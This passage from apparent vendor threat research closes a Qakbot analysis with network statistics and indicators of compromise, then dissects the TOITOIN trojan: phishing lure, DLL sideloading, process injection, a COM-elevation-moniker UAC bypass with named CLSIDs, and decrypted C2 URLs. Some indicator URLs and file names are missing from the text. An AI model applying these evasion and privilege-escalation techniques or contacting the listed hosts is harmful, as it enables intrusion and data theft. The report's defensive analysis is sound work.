Command-and-Control (C2) configuration. Upon decrypting the command-and-control (C2) configuration of Qakbot, a distinct pattern emerges in how the IP addresses and ports are separated. These values are initially represented in hexadecimal format, and Qakbot converts each byte of these values into their corresponding decimal equivalents to obtain the C2 addresses. For example: - IP: 58 7E 5E 04 (hex) -> (decimal) - Port: C3 50 (hex) -> 50000 (decimal) By converting these values from hexadecimal to decimal, Qakbot obtains the IP addresses and ports, which are essential in establishing connections with its command-and-control servers. Figure 22 - Qakbot's Command-and-Control (C2) configuration. Overall, the technical analysis provides essential insights into Qakbot's behavior, evasion techniques, and the significance of analyzing its unique components to effectively counter and mitigate this persistent threat. Understanding the malware's strategies empowers security professionals to develop robust defense measures and stay proactive in safeguarding networks and systems from Qakbot and other evolving malware. Network Analysis Conducting a thorough examination of the Qakbot Command and Control (C2) infrastructure, we observed the top five countries where Qakbot C2s are most active. These countries include the United States (US), Great Britain (GB), India (IN), Canada (CA), and France (FR). This analysis highlights the global reach and widespread distribution of Qakbot's C2 servers, indicating the significant geographic presence of the malware's command centers. Understanding the distribution of C2 servers in different countries is crucial for devising targeted defense strategies and collaborating with international cybersecurity partners to combat the threat effectively. Table 1 - Displays the top 5 countries where Qakbot Command and Control (C2) servers are most active. Figure 23 - Showcases the distribution of Qakbot Command and Control (C2) servers. Upon further analysis of the Command and Control (C2) servers, we observed that the transaction count of Qakbot C2s was significantly higher during March and April, than at the beginning of the year. This indicates a surge in the malware's activities during that period, and it may suggest that the threat actor(s) behind Qakbot were particularly active in executing campaigns during this timeframe. Table 2 - Displays the Qakbot transaction count month over month from January to May of 2023. Figure 24 - Illustrates spikes in the transaction count of Qakbot Command and Control (C2) activity by date. In March 2023, Germany experienced a significant surge in Qakbot Command and Control (C2) activity. During this period, major Qakbot C2s from the United States (US), Netherlands (NL), and France (FR) were directed towards Germany, indicating a targeted campaign against the country. A similar trend was observed in April 2023, although with a reduced volume of data transferred compared to March. The data suggests a concentrated effort by threat actors to target Germany during these months, potentially signaling specific motivations or objectives in that region. Figure 25 - Illustrates the Qakbot Command and Control (C2) activity specifically targeting Germany in March 2023. In April 2023, our observations revealed noteworthy Command and Control (C2) activity originating from Argentina (AR) and targeting the United States (US) with substantial data transfer. Additionally, Qakbot C2s in Italy (IT) were observed targeting Brazil (BR). These activities indicate an interconnected network of C2 servers and highlight the global nature of Qakbot's operations, with specific regions targeting each other for potential malicious activities. Figure 26 - Depicts the Qakbot Command and Control (C2) activity during April 2023. Conclusion In conclusion, Qakbot is a highly sophisticated banking trojan malware, strategically targeting businesses across different countries. This elusive threat employs multiple file formats and obfuscation methods within its attack chain, enabling it to evade detection from conventional antivirus engines. Operating through a phishing campaign, Qakbot continuously adapts to new distribution mechanisms to more effectively infect users. Through its experimentation with diverse attack chains, it becomes evident that the Threat Actor behind Qakbot is continuously refining its strategies. However, after June, a significant drop in Qakbot campaigns is observed, suggesting a possible pause in their activities. Zscaler's Threat Labs team extensively analyzed the behavior of various files associated with Qakbot, utilizing the MITRE ATT&CK framework to assess threat scores and triggered techniques. The team remains vigilant, continuously monitoring the campaign, and is prepared to unveil any new findings they may discover. To combat such threats effectively, organizations must remain vigilant and adopt best practices, including implementing multi-layered security defenses and conducting security awareness training. By staying proactive and collaborative, the cybersecurity community can thwart Qakbot's relentless pursuit of infiltrating and compromising systems, ensuring a safer digital landscape for individuals and enterprises worldwide. Zscaler Sandbox Coverage During the investigation of this campaign, Zscaler Sandbox played a crucial role in analyzing the behavior of various files. Through this sandbox analysis, the threat scores and specific MITRE ATT&CK techniques triggered were identified, as illustrated in the screenshots provided below. This comprehensive approach empowers cybersecurity professionals with critical insights into the malware's behavior, enabling them to effectively detect and counter the threats posed by this campaign. Figure 27 - Zscaler Sandbox report detecting and analyzing recent Qakbot malware campaign. Zscaler’s multilayered cloud security platform detects payloads with following threat names: Win32.Banker.Qakbot MITRE ATT&CK Techniques Tactic Technique ID Technique Name Initial Access T1566 Phishing Execution T1204 T1059 T1047 User Execution Command and Scripting Interpreter Windows Management Instrumentation Persistence T1053.005 T1547.001 Scheduled Task Registry Run Keys / Startup Folder Privilege Escalation T1053.005 Scheduled Task Defense Evasion T1027 T1070.004 T1112 T1202 T1574.002 T1574.001 T1564.001 T1055 T1218 Obfuscated Files or Information File Deletion Modify Registry Indirect Command Execution DLL Side-Loading DLL Search Order Hijacking Hidden Files and Directories Process Injection System Binary Proxy Execution Credential Access T1003 T1555.003 OS Credential Dumping Credentials from Web Browsers Discovery T1016 System Network Configuration Discovery Command and Control T1071 T1095 Application Layer Protocol Non-Application Layer Protocol Indicators Of Compromise (IOCs) Case Study 1 - March 2023 Description MD5 Network Malicious PDF Download JS File c986136d713f71449ad8ba970379d306 85.239.52[.]29/ONT[.]php Obfuscated JS file download Qakbot 3607ad95e33dd12803af676597df5c6a 45.66.248[.]9/qBSTwc/aw Qakbot Payload 770453c5d3ed689a451d55e947764742 - Description MD5 Network Malicious HTML file download Zip file 755a25e36cbf87b7e4415de2fdf0f9e3 https[:]//[.]php?88748 https[:]// https[:]//[.]php?24149 Downloaded Zip File 1a90b0c2129b8a552b6ec751ef1e6caa - Extracted JS File e2a21a2a7f5d2d85c0bcda95d6d0fc03 https[:]//azarmadar[.]com/aUqL/120 Qakbot Payload 74ee45a7dc4ca40eaaf817dc5959328d - Description MD5 Network Malicious PDF dd27c04bc998f69467c2c81c53a111ab http[:]//[.]tr/exi/exi.php Downloaded Zip File 789e3789de0eb630000adb1a2ed27d7e - Extracted WSF File e94c5f36ec0cccccb231e1cd04f2a646 https[:]//[.]br/0p6P/vLSyX Qakbot Payload 19c1526182fe5ed0f1abfafc98d84df9 - Description MD5 Network Malicious PDF cccda4837024a71fa74ceb420b5e854e https[:]//iquodigital[.]com/eps/delectusfuga.php Download Zip 2bc1cbc8c8f54245ca0fefb49c229f77 - Extracted HTA File 2394742a2c6fa05327cf1d48767af727 https[:]//zainco[.]net/OdOU/5k4ll56eOFo Qakbot Payload fb5ca6825e52d72a2010c8474ddaaa41 - Description MD5 Network Zip File 91fb1dcf5a6222262fd7fa77019bb1e4 - XLL File 68781578b0b58e21177c7b71f9b85567 - Qakbot ff58f9cf0740aead678d9e36c0782894 - Case Study 2 - April 2023 Description MD5 Network PDF File 2342ee9c7520abef3700b0fddf825c71 http[:]//eaglewingsuae[.]com/wicd/ Zip File 03c8cd94f624ae6074c8facb973d4b9d - WSF File 65f256e4ce4013742f2b59d869b6c663 http[:]//77.91.100[.]135/aSxBaqnfj98.dat Qakbot 4deae2c9f1f455670f2e091ce7e0b4e1 - Description MD5 Network OneNote File 77079f381ac044ad7a3df18607657f74 - MSI File 8056b3bafd82ce7e6156f1b3f314db52 - Cleanup PS1 File e1031ce77dde7a368159a9dd0ed7e6d4 - WSF File cb93c679ed14fe409df9a6cb564e488f https[:]//logswalker[.]com/aF8HY9p/2 Qakbot ce0d0ef75f3d7da7ba434a2017905132 - Case Study 3 - May 2023 Description MD5 Network PDF File f42544fe0db583e4b836e4b8cfc52802 https[:]//inspiratour[.]co[.]id/tsopexfzrf/ ZIP File 842fb152664671ca137b8ae390900fa6 - WSF File 934feee5657b08faec80a29cd2a77acc http[:]//45.155.37[.]101/a2nZbs476.dat http[:]//149.102.225[.]18/a2nZbs476.dat http[:]//207.148.14[.]105/a2nZbs476.dat http[:]//5.42.221[.]144/a2nZbs476.dat Qakbot 2b652290e80db5de823a915145eff417 - Description MD5 Network ZIP File 55027a65b1889b0642dbce8f39f4ba74 - Side Loading DLL 48f68450df1ca26e3fb1d7c07d0fd836 http[:]//109.172.45[.]9/Leq/15 Qakbot fce88b20bceebd0bfed68131820efab6 - Tue, 25 jul 2023 08:31:53 -0700 Meghraj Nandanwar The TOITOIN Trojan: Analyzing a New Multi-Stage Attack Targeting LATAM Region Summary Discover the intricate layers of a new sophisticated and persistent malware campaign targeting businesses in the LATAM region delivering the TOITOIN Trojan. Delve into the multi-stage attack methodology, from deceptive phishing emails to custom-built modules, as we dissect its techniques and shed light on its impact. Gain valuable insights into the evolving threat landscape and learn how organizations can fortify their defenses against this emerging Latin American cyber threat. Stay one step ahead with this in-depth analysis of TOITOIN and safeguard your business against advanced malware attacks. Introduction In the ever-evolving landscape of cyber threats, researchers from Zscaler ThreatLabz have recently uncovered a concerning development: a new targeted attack campaign striking businesses in the Latin American (LATAM) region. This sophisticated campaign employs a trojan that follows a multi-staged infection chain, utilizing specially crafted modules throughout each stage. These modules are custom designed to carry out malicious activities, such as injecting harmful code into remote processes, circumventing User Account Control via COM Elevation Moniker, and evading detection by Sandboxes through clever techniques like system reboots and parent process checks. The ultimate payload of this campaign is a new Latin American Trojan called TOITOIN, which incorporates a unique XOR decryption technique to decode its configuration file. Once decrypted, the trojan gathers crucial system information, as well as data pertaining to installed browsers and the Topaz OFD Protection Module, before sending it to the command and control server of the attackers in an encoded format. This blog post provides an in-depth analysis of this emerging malware campaign and its corresponding infection chain. Read on to learn more about this alarming threat. Key Takeaways The TOITOIN malware campaign targets businesses in the LATAM region, utilizing sophisticated techniques and multi-stage infection chains. By leveraging Amazon EC2 instances, the threat actors evade domain-based detections, making it more challenging to detect and block their activities. The analyzed campaign employs a series of custom-developed modules, including: Downloader Module: Downloads further stages, evades sandboxes through system reboots, and maintains persistence using LNK files. Krita Loader DLL: Sideloaded via a signed binary, it loads the InjectorDLL module. InjectorDLL Module: Injects the ElevateInjectorDLL into the remote process (explorer.exe). ElevateInjectorDLL Module: Evades sandboxes, performs process hollowing, and injects either the TOITOIN Trojan or BypassUAC module based on process privileges. BypassUAC Module: Utilizes COM Elevation Moniker to bypass User Account Control and execute the Krita Loader with administrative privileges. The final payload, the TOITOIN Trojan, employs custom XOR decryption routines to decode the configuration file containing the Command & Control server's URL. It transmits encoded system information and details about installed browsers and the Topaz OFD Protection Module to the C&C server. In the absence of the configuration file, the information is sent via a POST request using curl. Zscaler's Zero Trust Exchange provides strong protection against sophisticated malware campaigns like TOITOIN, leveraging its zero trust model, advanced threat intelligence, cloud-native architecture, and granular access controls to ensure the security and integrity of customer environments. TOITOIN Infection Chain In May 2023, diligent threat hunters within the Zscaler cloud, recognized as the world's largest security cloud, made a significant breakthrough. Their discovery involved the identification of numerous malware samples concealed within compressed ZIP archives. All of the identified archives were found to be hosted by Amazon EC2, as shown in Figure 1 below. Upon closer examination and thorough analysis of related malware samples obtained from Zscaler cloud, it became evident that a novel campaign had emerged. This campaign, named TOITOIN introduced a series of custom-built malwares specifically designed to target businesses operating within LATAM. Commencing in May 2023, this malicious endeavor continues to pose an ongoing threat, demanding immediate attention and comprehensive understanding from defenders. Figure 1 - Researchers discover suspicious ZIP archives hosted on Amazon EC2 during threat hunting activities in Zscaler cloud. The TOITOIN malware infection chain, shown in Figure 2 below, employed in this targeted campaign follows a well-crafted sequence, starting with an initial compromise phishing email. Figure 2 - The multi-staged infection chain. In the context of this campaign, Figure 3 offers a glimpse into the deceptive email crafted with the specific intent to entrap a prominent Investment Banking company in Latin America. Carefully designed, the email capitalizes on a Payment Notification Lure, alluring the recipient to engage further by clicking on a button labeled 'Visualizar Boleto,' which translates to 'View Invoice' in English. This strategic choice of wording aims to evoke a sense of urgency and entice the target to explore the contents of the email, ultimately falling into the trap set by the threat actors. Figure 3 - Screenshot of phishing email sent by threat actors behind this TOITOIN campaign. Upon clicking the button in the phishing email, the user unwittingly initiates a chain of events. The URL http[:]//alemaoautopecas[.]com/1742241b/40c0/df052b5e975c.php?hash=aHR0cHM6Ly9teS5ub2lwLmNvbS9keW5hbWljLWRucw is then opened, serving as an intermediary redirect. Subsequently, the victim's browser is redirected once again, this time to the address http[:]//contatosclientes[.]services/upthon. It is at this point that the malicious ZIP archive is stealthily downloaded onto the victim's system, and begins infiltrating their defenses. Notably, several other domains have been identified as vehicles for delivering these malicious ZIP archives. These domains include: atendimento-arquivos[.]com arquivosclientes[.]online fantasiacinematica[.]online By diversifying the delivery channels, the threat actors behind this campaign have effectively evaded detection based on domain reputation. However, it is worth mentioning that the malicious ZIP archives were hosted on an Amazon EC2 instance as shown below in Figure 4. Leveraging the capabilities of Amazon's cloud infrastructure, the attackers have managed to stay one step ahead, shielding their activities from domain-based detection mechanisms. Figure 4 - Malicious ZIP archive downloaded from the Amazon EC2 instance. To further obfuscate their intentions, the threat actors adopted a dynamic approach to naming the ZIP archives. With each download, the server generates a new and randomly generated file name, thwarting simplistic attempts at detection based on static file naming patterns. This tactic adds an additional layer of complexity to the campaign, making it more challenging to identify and mitigate the threat effectively. Within the ZIP archive labeled as "," a malicious executable file titled "HCEMH.hqdrm.63130.exe" resides. This specific file operates as the designated downloader module, orchestrated by the threat actors to initiate the retrieval of numerous payloads from the server under their control. Alongside this primary function, the downloader module, analyzed in the next section, also encompasses a range of evasion techniques, strategically implemented to circumvent detection and hinder security measures. Analysis Of The Multi-Staged TOITOIN Infection Chain Stage-1: Downloader module Examination of the TOITOIN downloader module reveals its intricate operations, including string decryption routines, path retrieval, log file creation, and the selection of random file names. Understanding the string decryption process employed by malware is vital for defenders as it enables them to detect encrypted or obfuscated strings, analyze the attack, attribute it to specific threat actors, respond effectively, and develop mitigation strategies. The findings in this section shed light on the downloader module's functionalities and provide valuable insights into the overall execution flow of the TOITOIN malware. During the analysis of the malware, specific attention was given to the downloader module. The path to the module's Program Database (PDB) file was identified as "F:\Trabalho_2023\OFF_2023\LOAD_APP_CONSOLE_C_PLUS\LOAD\x64\Release\NAME.pdb." Upon execution, the downloader module initiates a String Decryption routine. Initially, the encrypted hex strings are concatenated in reverse order, employing multiple heap allocations. The resulting concatenated encrypted hex string is then passed as an argument to the decryption routine, as depicted in Figure 5 below. Figure 5 - Illustrates the String decryption routine, showcasing the concatenation process. In the decryption routine, the encrypted hex string undergoes a series of operations. Firstly, the string is reversed, and subsequently, an XOR operation is performed between the N and N+1 byte, where N is incremented by 2 for each operation. To facilitate this process, a string decryptor was developed (Code: Appendix A) specifically for the string decryption routine. Utilizing this string decryptor, the final concatenated encrypted hex string can be decrypted, revealing a decrypted string in the pattern of "@1-55: <hex_string>." Each of these encrypted hex strings is then individually decrypted using the same string decryption function, based on the specific index value passed to the function according to the requirements. Figure 6 shows the decryption of the encrypted hex strings using the string decryptor. Figure 6 - Overview of the string decryption routine, focusing on the decryption of the downloader URL. Once decrypted, the downloader module retrieves the paths to the 'Appdata', 'HomeDrive', and 'Username' of the infected system by calling the getenv() function, with the decrypted strings "appdata, homedrive, username" as arguments. The module then proceeds to create a log file named "<reverse_of_computer_name>.log" within the "AppData/Roaming" directory. The computer name is obtained by invoking the GetComputerNameA() function. Additionally, the downloader module selects a random file name from a collection of encrypted hex strings, shown below in Figure 7. These file names are decrypted dynamically using the same string decryption routine. The chosen file name is assigned to a signed executable responsible for sideloading the Krita Loader DLL. Further analysis of this process is presented in the subsequent sections. Figure 7 - Showcases a list of randomly generated file names. Once a file name is selected, the downloader module proceeds to create a batch script in the temp directory with a dynamically generated name. The necessary information for the batch script, including the path to the temp directory, extensions, and content, is decrypted using the string decryption routine. Upon execution, the batch script writes and executes a VBScript within the temp directory. The VBScript, in turn, creates a shortcut (.LNK) file in the startup folder. The name of the shortcut file, "icepdfeditor.lnk," is dynamically set to the previously selected random file name from the list. The TargetPath of the shortcut file is assigned as "C:\Users\Public\Documents\knight\icepdfeditor.exe," with the file name again set to the random selection from the list. The VBScript, identified as "rnTiucm.vbs," is subsequently deleted towards the end of this process. Figure 8 - Batch script creating LNK file in the StartUp folder for persistence. The above figure illustrates the batch script's creation of an LNK file in the StartUp folder, ensuring persistence on the compromised machine. By placing the "icepdfeditor.lnk" shortcut in the StartUp folder, it executes every time the system restarts, subsequently launching "icepdfeditor.exe" in the Public Documents folder. Following this, the downloader module initiates the downloading routine, decrypting URLs dynamically using the string decryption process, as shown in Figure 9 below. Figure 9 - String decryption routine (downloader URLs). Then in Figure 10 demonstrates the use of InternetOpenUrlA() and InternetReadFile() functions to retrieve encrypted data containing multiple payloads for this complex attack, disguised here as mp3 files from the URL: http[:]//cartolabrasil[.]com/Homicidio[.]mp3/1-6.mp3. Figure 10 - Downloading multiple payloads from http[:] The encrypted data is decrypted and reversed, and the resulting payloads are written to a newly created folder within the Public Documents directory, as depicted in Figure 11. Figure 11 - Multiple payloads downloaded in the public documents folder. In Figure 11, it can also be observed that the encrypted payloads have dynamically generated filenames based on the computer name, username, etc.. The Loader DLL, "ffmpeg.dll," has its filename decrypted using the string decryption process. The signed binary, "icepdfeditor," is randomly selected from the list of file names dynamically, and the extensions are decrypted accordingly. Additionally, the downloader creates a configuration file with the ini extension named after the computer name in the Public Documents folder, containing details about the encrypted payloads. Towards the end of this process, the downloader generates a batch script in the "AppData\Roaming" directory, named after the computer name. Upon execution, this script restarts the system after a 10-second timeout, as depicted in Figure 12 below. The content of the batch script is decrypted using the string decryption function. Figure 12 - Evades sandbox & executes the LNK file in the startup folder by restarting the system. The system reboot serves to evade sandbox detection since the malicious actions occur only after the reboot. Upon restarting, the shortcut (.LNK) file, "icepdfeditor.lnk," in the startup folder is automatically executed, triggering the execution of "icepdfeditor.exe" from the Public Documents folder. "icepdfeditor.exe" is a valid signed executable by "ZOHO Corporation Private Limited," downloaded alongside the other payloads. Figure 13 shows the execution of "icepdfeditor.exe." Figure 13 - Signed binary by ZOHO Corporation downloaded alongside malicious payloads. Upon final execution, the signed binary, "icepdfeditor.exe," sideloads the malicious Krita Loader DLL, "ffmpeg.dll," from the current directory "C:\Users\Public\Documents\<username>\" taking advantage of the Windows Search and Load order to load the malicious Loader DLL instead of the legitimate DLL, as illustrated in Figure 14. Figure 14 - Signed Binary “icepdfeditor.exe” sideloads the malicious Krita Loader DLL “ffmpeg.dll”. Stage-2: Krita Loader DLL (ffmpeg.dll) PDB Path: F:\Trabalho_2023\OFF_2023\DLL_Start_OK\x64\Release\DLL_Start_OK.pdb In the analysis of the Krita Loader DLL (ffmpeg.dll), it is observed that the DLL reads encoded data from the <reverse_computer_name>.jpg file. This encoded data is then dynamically reversed and decoded using a replacement routine. The replacement routine replaces special characters with specific characters based on an algorithm, for example, replacing "!" with "A". Figure 15 - Showcases the decoding process of the DLL, involving reverse and replace functions. As depicted in the preceding screenshot, the data is subsequently subjected to base64 decoding, resulting in the formation of a PE file. This PE file is then written to the temporary directory, utilizing a randomly generated file name, as illustrated in Figure 16. Figure 16 - Demonstrates the process of decoding the DLL through Base64 decoding. Subsequently, the decoded InjectorDLL is loaded into memory by the Krita Loader DLL using the LoadLibraryA() function. Control is then transferred by retrieving the address of the export function "TEMP" through the GetProcAddress() function. Figure 17 - Illustrates the loading of the InjectorDLL via the LoadLibraryA() function. Stage-3: InjectorDLL Module PDB Path: F:\Trabalho_2023\OFF_2023\DLL_Start_IN\x64\Release\DLL_START_IN.pdb Once the InjectorDLL is loaded, it proceeds to read encoded data from another <computer_name>.jpg file. Similar to the Krita Loader DLL, the InjectorDLL dynamically reverses and decodes the data using a replacement routine that replaces special characters with specific characters based on a predefined algorithm. Subsequently, the data undergoes base64 decoding, resulting in the formation of the ElevateInjectorDLL module. This module is then injected into the remote process "explorer.exe" using a sequence of functions: OpenProcess, VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread. The screenshot shown in Figure 18 below illustrates this injection process. Figure 18 - Demonstrates the injection of the ElevateInjectorDLL module into the remote process "explorer.exe." Stage-4: ElevateInjectorDLL Module PDB Path: F:\Trabalho_2023\OFF_2023\DLL_Start_UP\x64\Release\DLL_Start_UP.pdb Once injected into the explorer.exe process, the ElevateInjectorDLL module performs initial checks. It verifies whether the parent process is either "explorer.exe" or "winlogon.exe" and checks if the mutex "explorer" or "winlogon" has already been created using the OpenMutexA() function. If the conditions are met, the module creates the mutex "explorer" or "winlogon" based on the parent process as shown in Figure 19 below. Subsequently, it executes the main routine to carry out further actions. Figure 19 - Showcases the process of checking the parent process, specifically verifying if it is either "explorer" or "winlogon". This technique ensures that the module evades sandboxes by verifying the parent process. If the parent process does not match the expected value, the malicious code remains dormant and is not executed. In this particular scenario, as the parent process is "explorer.exe," the main routine is executed. Within this routine, specific strings are base64 decoded. These strings contain the server address (191[.]252[.]203[.]222/Up/indexW.php) and the paths of the target processes (explorer.exe and svchost.exe) where the subsequent injection stages will take place. Additionally, the ElevateInjectorDLL checks whether the process is elevated. In this case, as the process is not elevated, the DLL reads and decrypts another JPG file from the Public Documents folder. This decryption process forms the next stage module called "BypassUAC." Subsequently, the module performs process hollowing to inject the BypassUAC module into another explorer.exe process that was previously spawned in a suspended state. Figure 20 - Demonstrates the injection of the BypassUAC module into the explorer.exe process when the process is not elevated. Stage-5: BypassUAC Module PDB Path: F:\\Trabalho_2023\\OFF_2023\\EXE_BypassUAC\\x64\\Release\\BypassUAC.pdb The BypassUAC Module is responsible for performing User Account Control (UAC) bypass, enabling the execution of the Downloader module with administrator privileges. When the previously injected BypassUAC Module is executed within the remote process explorer.exe, it exits without executing the main routine under two conditions. Firstly, if the mutex "explorer" is not created, and secondly, if the mutex "bypass" is already created. However, if these conditions are not met, the module proceeds to create the "bypass" mutex before continuing its execution. Figure 21 - Depicts the process of opening and creating mutexes. In the context of UAC bypass, the malware leverages the COM Elevation Moniker "Elevation:Administrator!new:" along with specific elevated COM Objects. The purpose is to bypass the User Account Control (UAC) restrictions and gain elevated privileges on the system. To achieve this, the malware utilizes the CLSID {3AD05575-8857-4850-9277-11B85BDB8E09}, which provides functionalities related to copy, move, rename, delete, and link operations. Additionally, the CLSID {BDB57FF2-79B9-4205-9447-F5FE85F37312} is employed, specifically designed for the installation of Internet Explorer add-ons. By exploiting these elevated COM Objects, the malware aims to elevate its privileges and carry out malicious activities without being hindered by UAC restrictions. Figure 22 - Illustrates the UAC bypass technique achieved through the use of the COM Elevation Moniker. In the process of UAC bypass, the malware utilizes the Copy/Move/Rename/Delete/Link COM Object. This COM Object serves the purpose of copying the "cmd.exe" file from the System32 Folder to the Temp directory with administrator privileges. The copied file is then renamed as [1]bdeunlock.exe. This technique allows the malware to manipulate system files and execute commands with elevated privileges, facilitating further malicious activities. Figure 23 - Depicts the operation of copying the "cmd.exe" file into the Temp directory with administrator privileges using a COM Object. Moreover, the auto-elevating Internet Explorer Add-on Installer, known as "IEInstal.exe," is triggered through the COM Object. This action aims to execute the signed binary "icepdfeditor.exe" with elevated privileges by spawning a new process named [1]bdeunlock.exe. The process is launched with specific arguments, namely "/C start <path_to_signed_binary>," as indicated in Figure 24. This technique allows the malware to execute the signed binary with elevated permissions, enabling it to carry out malicious activities on the system. Figure 24 - Demonstrates the UAC bypass executed by the Internet Explorer Add-On Installer. This bypass enables the execution of the Krita Loader DLL with elevated privileges. Consequently, the signed binary is executed with elevated privileges, facilitating the sideloading of the Krita Loader DLL onto the machine with administrative privileges. Once the Krita Loader DLL is sideloaded with elevated privileges, it follows the same routine as previously discussed. However, in this instance, the ElevateInjectorDLL module, which previously injected the BypassUAC module, verifies whether it has elevated privileges. If elevated privileges are present, the module decrypts the final TOITOIN Trojan and injects it into the remote process "svchost.exe," as depicted in the screenshot provided in Figure 25 below. Figure 25 - Displays the injection of the TOITOIN Trojan into the svchost.exe process. Stage-6: TOITOIN Trojan The ElevateInjectorDLL injects the new Latin American Trojan, TOITOIN, into the remote process "svchost.exe." Upon execution, the Trojan first reads the encoded <computer_name>.ini configuration file that was previously written in the Public Documents folder by the Downloader module, as the captured screenshot in Figure 26 below shows. Figure 26 - Demonstrates the process of reading the INI configuration file. Below, Figure 27 reveals the decoding process of the hex blob within the INI Configuration file. The hex blob is reversed and converted to ASCII format, unveiling its original content. Figure 27 - Showcases the decoding process of the INI Configuration File. Each of the #<1-6> hex strings undergoes further decoding using the same logic. In the Figure 28 screenshot below, the decoded #1 hex string reveals the complete path and file name of the multiple payloads that were downloaded by the Downloader from http[:]//cartolabrasil[.]com. Figure 28 - Depicts the continued decoding process of the INI Configuration File. Additionally, the #3 hex blob undergoes decoding using the aforementioned logic, resulting in another hex blob. This hex blob is then decrypted using a custom XOR logic, such as applying the XOR operation with the first two bytes (0D44 -> (0x44 ^ 0x31) - 0x0D = "h"). ThreatLabz researchers developed a decryptor specifically for the INI Configuration file, as shown below in Figure 29. Figure 29 - Showcases the INI Configuration Decryptor, which reveals the Command & Control (C&C) URL. In Figure 29, the decrypted value extracted from the INI Configuration file reveals the Command & Control (C&C) URL: http[:]//afroblack[.]shop/CasaMoveis. However, during the analysis of a different corrected sample, a distinct C&C server was discovered: http[:]//contabilidademaio[.]servebeer[.]com/Robs/counter. The final backdoor decrypts various strings, including C&C URLs and other crucial information, using a custom XOR decryption logic based on the INI configuration values of "1" or "2": 5EBCDD2160A3E060F95B, 4644454647484786DF61 - /0202.php B9D91B5B9FC2C1035AFB, 07076684E60A094881C0 - /POST.php 4980C50B4AB5D534A72BBD144483D7084A9D21B3164E8B88DA7BD9, D40CB117B6C1C1C115B629A13291C516B82AAD3E80D87493C70642 - http[:]//bragancasbrasil[.]com 37AE12B71962A0FE01097390F01861BEC0C9C6CC - http://179[.]188[.]38[.]7 1D7E85858489898A8B8C8E87EA0B6588E6017E96, 95F61C7A9BFE1F60A1E2277EE3027AFF7EF674AC - 26/04/2023(TOITOIN) Some of the decrypted strings include paths to payloads, browser installations, and relevant dates. Additionally, a substantial encrypted hex blob is decrypted using the same custom XOR decryption logic. This hex blob consists of strings related to file paths, browser types, and timestamps. The TOITOIN Trojan employs these decrypted strings in its operation: @36:C91756F9588E30A03F6E85DF7DD376E3094988D862B33249BC284E9E20A2359DC81DBD0157B42B92C6 - \Program Files\Topaz OFD\Warsaw\core.exe @37:86D025A529BF2C - [Core] @38:5F8BF014BD2A - [64x] @39:204A4C4FF665 - [32x] @45:679F3E9C3590C41062FB5FFF5CF07C - Google\Chrome\ @46:314F8F3B9533AE217087C1055BF051F864FB54F76CE362EB2BA12BA1 - Mozilla Firefox\firefox.exe @47:748CCB71E76BE87FC2D3289133AE2F90C406538DC30D4C89C90D4340943C90 - Internet Explorer\iexplore.exe @48:1051F2538BCC1FBD006D8DCC034494C11FB116B528A13699F66DD40B - Programs\Opera\launcher.exe @49:5C9D21A1389BCD0A4C99D97BD175E775D577ED518380D47CD0 - Programs\Opera\opera.exe @50:47A53E9032903595CA0E5B91C41DB32153F2528FC91C4CF16AE866F350F269FC558B88DC64F8 - Microsoft\Edge\Application\msedge.exe @51:AB364E82CB0D4886C91EA1CF - [Iexplorer] @52:1541B52F9031AF24B0 - [Chrome] @53:2EB8379723AC27A235A3 - [Mozzila] @54:5F8BEB6DE367F966 - [Opera] @55:5882F66AE077E5 - [Edge] The Trojan fetches the Windows version by querying the ProductName registry key value, retrieves the environment variable %homedrive% and the path to the Program Files directory, and determines whether the system is 32-bit or 64-bit. Based on the installed browsers, including Chrome, Edge, Opera, Mozilla Firefox, and Internet Explorer, the Trojan assigns specific values to each browser. It also checks for the presence of the Topaz OFD - Protection Module at the specified path and sets the value "[Core]" accordingly. Furthermore, another encrypted hex blob is decrypted, containing strings related to certain variables, such as ClienteD.php?1=, - (hyphen), Versao_DLL(, Data(, dd/mm/yyyy, and hh:mm:ss: @36:F5639735AF24A329BF3552F36DEC1D7F8D - \ClienteD.php?1= @37:77A6E232 - - @38:D7C6C2D31BB115B92AA8394CA9C4DD - Versao_DLL( @39:2170ACFD73E56BFD17 - Data( @40:F266FB1AB61575DF68D07B - dd/mm/yyyy @41:EB65FC06429EE96CEE - hh:mm:ss Leveraging these decrypted strings, the Trojan assigns values to variables like AA1, AA2, AA3 & AA4, AA5, and AA10, using the previously decrypted encoded format. For example, AA1 represents the computer name, AA2 represents the Windows version, AA3 & AA4 represent the installed browsers, AA5 represents the bit value (32x or 64x), and AA10 represents the date (26/04/2023, in this case). AA1 - 0393948384C453D205F445B4355444 --> DESKTOP-******* (Computer Name) AA2 - E6F696471636574654020313023777F646E69675 --> Windows 10 Education (Windows Version) AA3 & AA4 - D556764654B5D5275627F6C607875694B5 --> [Iexplorer][Edge] (Installed browsers & protection module) AA5 - D5874363B5 --> [64x] (Bit) AA10 - 92E494F44594F4458233230323F24303F26323 --> 26/04/2023(TOITOIN) Analyzing and understanding these decrypted strings allows for a better understanding of the TOITOIN Trojan's configuration, the system it operates on, and the communication channels it utilizes for command and control. TOITOIN utilizes the decrypted strings in the following manner in order to gather the system & browser information: 1. It fetches the Windows version by querying the ProductName value from the registry key: SOFTWARE\Microsoft\Windows NT\CurrentVersion. 2. It retrieves the environment variable %homedrive% using GetEnvironmentVariableW, which usually corresponds to the C:\ drive. 3. It determines whether the system is 32-bit or 64-bit and sets the value to [64x] or [32x] accordingly. 4. It checks if specific web browsers are installed on the system by verifying the existence of corresponding folders and files. The checked browsers include Chrome, Edge, Opera, Mozilla Firefox, and Internet Explorer. 5. Based on the installed browsers, it assigns specific values for each browser: [Iexplorer] for Internet Explorer [Chrome] for Chrome [Mozzila] for Mozilla Firefox [Opera] for Opera [Edge] for Microsoft Edge 6. It checks whether the Topaz OFD - Protection Module is installed at the path \Program Files\Topaz OFD\Warsaw\core.exe. If the module exists, it sets the value "[Core]". By leveraging these decrypted strings and performing these checks, the TOITOIN Trojan adapts its behavior based on the system's Windows version, installed browsers, and the presence of the Topaz OFD - Protection Module. Command & Control Communication The TOITOIN Trojan communicates with the Command & Control (C&C) server located at http[:]//afroblack[.]shop/CasaMoveis\ClienteD.php, shown in Figure 30 below, to transmit encoded system information, browser details, and Topaz OFD Protection Module information. Figure 30 - Displays the information transmitted to the Command & Control (C&C) server located at http[:]\ClienteD.php. The exfiltrated information, once decoded, includes the following data: Computer Name: DESKTOP-****** Windows Version: Windows 10 Education Installed Browsers & Topaz OFD Protection Module: [Iexplorer][Edge] OS Bit Version: [64x] DLL Version: Versao_DLL(26/04/2023(TOITOIN)) Data: Date and time of execution Figure 31 - Capture of decoded information 